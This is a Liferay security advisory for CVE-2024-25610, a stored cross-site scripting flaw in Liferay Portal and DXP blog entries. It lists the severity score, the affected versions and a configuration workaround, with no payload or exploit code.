CVE-2024-25610 Stored XSS with Blog entries (Insecure defaults)

Description

In Liferay Portal and Liferay DXP, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field.

Severity

9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

Affected Version(s)

  • Liferay Portal 7.4.0 through 7.4.3.12
  • Liferay Portal 7.3.0 through 7.3.7
  • Liferay Portal 7.2.0 and 7.2.1
  • Liferay Portal, older unsupported versions
  • Liferay DXP 7.4 before update 9
  • Liferay DXP 7.3 before update 4
  • Liferay DXP 7.2 before fix pack 19
  • Liferay DXP, older unsupported versions

Fixed Version(s)

Notes

Workaround:
Navigate to: System Settings > Security Tools > AntiSamy Sanitizer
and remove com.liferay.blogs.model.BlogsEntry from the Whitelist

Publication date: Tue, 20 Feb 2024 12:30:00 +0000

Security advisories for Liferay's enterprise offerings (e.g., Liferay DXP) are only listed here since 2023. Historial advisories are availabe in the Help Center.